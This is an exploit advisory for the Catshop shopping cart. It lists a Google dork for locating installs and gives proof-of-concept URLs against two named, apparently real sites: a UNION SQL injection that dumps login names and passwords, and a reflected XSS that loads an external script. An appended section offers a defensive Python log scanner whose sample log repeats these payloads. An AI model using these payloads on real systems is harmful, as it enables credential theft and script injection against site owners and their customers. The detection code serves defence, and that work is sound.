----------------------------------------------------
Catshop Cart SQL Injection & XSS
----------------------------------------------------

/* INTRO */
By: e.wiZz!
Info: It's not my fault 'coz I'm Bosnian and unemployed. Cheers.
Site: madspot.org
Mail: ew1zz@hotmail.com

/* OUTRO */
Script site: www.mns.it
Info: Catshop is a shopping cart developed by mns.it. The other info is in Italian; I can't translate it and I don't care.
Dork: intext:"MNS Media & Net service" OR allinurl:/cat_shop/

POC:

SQL Injection (the id parameter of viewProduct.php; the UNION payload reads nick and pass from the login table):
http://www.colferid.it/cat_shop/viewProduct.php?id=-1+union+all+select+1,2,nick,pass,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+login/*
http://sidermetal.biz/cat_shop/viewProduct.php?id=-1+union+all+select+1,2,nick,pass,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+login/*

XSS (the same id parameter is reflected into the page):
http://colferid.it/cat_shop/viewProduct.php?id=%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E
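As an added example from the defender's side (not part of the original advisory), a small Python checker that scans access-log lines for requests to viewProduct.php whose id parameter is not a plain numeric product id, classifying the UNION SELECT and script-tag patterns shown above; the log lines, client IPs and the host example.invalid are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not taken from the advisory). The first
# two mirror the PoC patterns above; the third is a benign product lookup.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /cat_shop/viewProduct.php?id=-1+union+all+select+1,2,nick,pass,5+from+login/* HTTP/1.1" 200 512
203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /cat_shop/viewProduct.php?id=%3CSCRIPT%20SRC=http://example.invalid/x.js%3E%3C/SCRIPT%3E HTTP/1.1" 200 498
198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "GET /cat_shop/viewProduct.php?id=42 HTTP/1.1" 200 1024
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)
SCRIPT_RE = re.compile(r"<\s*script\b", re.IGNORECASE)


def classify_id(value):
    """Classify one already URL-decoded id value.

    A legitimate product id is a bare positive integer; anything else is at
    least 'suspicious', and the two advisory patterns get their own labels.
    """
    if re.fullmatch(r"\d+", value):
        return "ok"
    if UNION_RE.search(value):
        return "sqli"
    if SCRIPT_RE.search(value):
        return "xss"
    return "suspicious"


def scan_log(text):
    """Return (client_ip, verdict, decoded_id) for every viewProduct.php request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/cat_shop/viewProduct.php"):
            continue
        # parse_qs decodes %XX escapes and '+' to space, so the payload is
        # inspected in the same form the application would receive it.
        for value in parse_qs(url.query).get("id", []):
            findings.append((line.split()[0], classify_id(value), value))
    return findings


if __name__ == "__main__":
    for ip, verdict, value in scan_log(SAMPLE_LOG):
        print(f"{ip}\t{verdict}\t{value}")
```

The same numeric-only check, applied server-side before the id reaches the query and the HTML, is the fix for both issues.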